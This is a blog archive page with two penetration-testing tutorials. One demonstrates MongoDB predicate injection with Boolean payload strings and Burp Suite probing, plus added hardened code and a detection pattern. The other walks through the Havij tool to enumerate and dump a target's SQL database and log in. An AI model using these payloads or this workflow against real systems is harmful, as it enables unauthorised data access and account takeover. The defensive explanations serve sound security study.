Posts

Showing posts from November, 2024

MongoDB Injection Attack

This is a demo exploit for a MongoDB filter option.

Filter: Accessories

Business logic:

    if (this.category == "Accessories") {
        // ...do something
    }

Exploitation:

    if (this.category == 'Accessories' && this.limit == 3)  // Original
    if (this.category == 'Accessories' || '1' == '1' && this.limit == 3)  // Payload injected
    {
        // ...do something
    }

Capture the request in Burp Suite.

Try combinations of special characters to make the request produce an error:

    "   '   $   {   }   `   ;

Try combinations of Boolean expressions:

    ' && 1 == 1 ' && '1' == '1 ' || 1 == 1 ' || '1' == '1 ' || 1 || ' || 1 || ' ' || '1' == '1

Note: Make sure to encode the payload before sending it (CTRL + U).
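Why the injected predicate above widens the result set, and how to close it, shown as an added example that is not code from the original post. It assumes a stand-in for server-side `$where` evaluation over in-memory documents; the sample documents, the allow-list and all function names are constructed for illustration.

```javascript
// Constructed sample documents; field names follow the post's predicate.
const products = [
  { name: "Phone case", category: "Accessories", limit: 3 },
  { name: "Gift card", category: "Gifts", limit: 3 },
  { name: "Unreleased watch", category: "Wearables", limit: 0 },
];

// Stand-in for $where (assumption: no real database here): evaluates a
// JavaScript predicate string with `this` bound to each document.
function runWhere(docs, predicate) {
  const fn = new Function("return (" + predicate + ");");
  return docs.filter((doc) => Boolean(fn.call(doc)));
}

// Vulnerable: the request parameter is concatenated into predicate source code.
// With the post's payload the predicate parses as
//   category == 'Accessories' || ('1' == '1' && limit == 3)
// so the category check no longer restricts anything.
function findVulnerable(docs, category) {
  return runWhere(docs, "this.category == '" + category + "' && this.limit == 3");
}

// Hardened: the parameter is only ever data. It must be a plain string from an
// allow-list and is compared as a value, never parsed as code.
const ALLOWED = new Set(["Accessories", "Gifts", "Wearables"]);
function findHardened(docs, category) {
  if (typeof category !== "string" || !ALLOWED.has(category)) {
    throw new TypeError("invalid category");
  }
  const filter = { category: category, limit: 3 }; // shape of a find() filter
  return docs.filter((d) => Object.keys(filter).every((k) => d[k] === filter[k]));
}

// Detection helper: flag parameters carrying the characters and Boolean
// operators the post probes with, for logging or alerting at the API edge.
function looksLikeInjection(value) {
  return typeof value !== "string" || /["'`${};]|\|\||&&/.test(value);
}
```

The detection helper is a logging aid only; the fix is the typed filter, which never turns request data into code.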

Havij - Advanced Automated SQL Injection

Tool Name: Havij (Educational Purpose Only)

Description: Havij is an automated SQL injection tool designed for penetration testers to identify and exploit SQL injection vulnerabilities in web applications. It streamlines the testing process, allowing security professionals to efficiently assess the security of a website's database interactions.

Download URL: https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/

Step 1: Enter the application target link in the Havij tool and click Analyze.

Step 2: Get the application details from the Info section.

Step 3: Get the application's databases from the Tables section.

Step 4: Get the application database records with column details.

Successfully logged in to the application, as shown in the screenshots below.